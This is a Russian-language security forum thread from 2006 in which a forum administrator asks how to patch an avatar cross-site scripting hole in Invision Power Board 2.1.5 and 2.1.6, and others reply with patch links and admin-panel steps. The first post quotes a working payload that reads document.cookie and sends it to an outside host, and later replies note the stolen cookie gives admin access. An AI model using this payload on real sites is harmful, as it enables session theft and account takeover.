HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?
  #1  
Старый 30.06.2006, 13:10
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?
Как всем известно в форуме IPB 2.1.5 и 2.1.6 есть такая бага, которая позволяет получить ХЕШ через аватар, по средством:

[img]javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/img]

для версии 2.1.6 нужно просто убрать теги [img]

у мня просьба : Подскажите как профиксить эту багу? в каком модуме ошибка и как ее исправить?
Если можно ответ скинуть в личку.

Заранее благодарен.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 30.06.2006, 13:14
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию
В основном всё на сайт по безопасности расписано, где, чего, в каком модуле...поищи
 
Ответить с цитированием

  #3  
Старый 30.06.2006, 14:27
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию
Тебе вот СЮДА

На даном форуме дыры находят,а не заделывают...
 
Ответить с цитированием

  #4  
Старый 30.06.2006, 14:37
limpompo
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
С нами: 10897046

Репутация: 1329


По умолчанию
http://www.ibresource.ru/forums/index.php?s=&showtopic=31531&view=findpost&p=18774 3
 
Ответить с цитированием

  #5  
Старый 30.06.2006, 15:19
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию
спс я нашол там одну темку , но чет не помогает, может эта бага еще осталась из версии 2.0.*
 
Ответить с цитированием

  #6  
Старый 30.06.2006, 15:32
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию
Вот последняя известная бага, как пофиксить здесь.
http://www.ibresource.ru/forums/index.php?showtopic=31531&pid=187743&st=0%EF%BF%BD entry18774
 
Ответить с цитированием

  #7  
Старый 30.06.2006, 15:35
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами: 10770849

Репутация: 23
По умолчанию
Да эти я заделал , я никак немогу разобраться с той что через аватар
 
Ответить с цитированием

  #8  
Старый 30.06.2006, 16:01
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию
Если ты хочешь запретить [img] теги, ну то есть использование в них изображений. В которых можно поместить сниффер.

1.Заходишь в админу
2.Идешь в Настройки(В меню выбора сферху)
3.В "системных настройках" выбираещь "все основные настройки"
4.Переходишь в Темы, Сообщения и Опросы
5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят.
 
Ответить с цитированием

  #9  
Старый 30.06.2006, 17:39
bl4ck-cat
Познающий
Регистрация: 17.06.2006
Сообщений: 76
С нами: 10473159

Репутация: 32
По умолчанию
хм... а разве хэш воруется не солёный? тоесть от него же толку нету это просто активная хсс.... только кукизы тырить...
 
Ответить с цитированием

  #10  
Старый 30.06.2006, 18:11
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
С нами: 10530322

Репутация: 47
По умолчанию
bl4ck-cat
С этим кукисом можно только под Админом зайти. Ну а топикстартер не хочет этого, т.к. злоумышленик может по форуму как админ лазить, все редактировать и т.д.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Уязвимости invision board версии 2.1.6? XMaster Уязвимости CMS / форумов 32 27.06.2006 21:01
Уязвимости Ipb 2.1.6 - есть вопрос spheere Уязвимости CMS / форумов 0 27.05.2006 21:16
Как убрать копирайты в титле (powered by....) в Ipb 2.1.6? micle Уязвимости CMS / форумов 6 16.05.2006 08:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.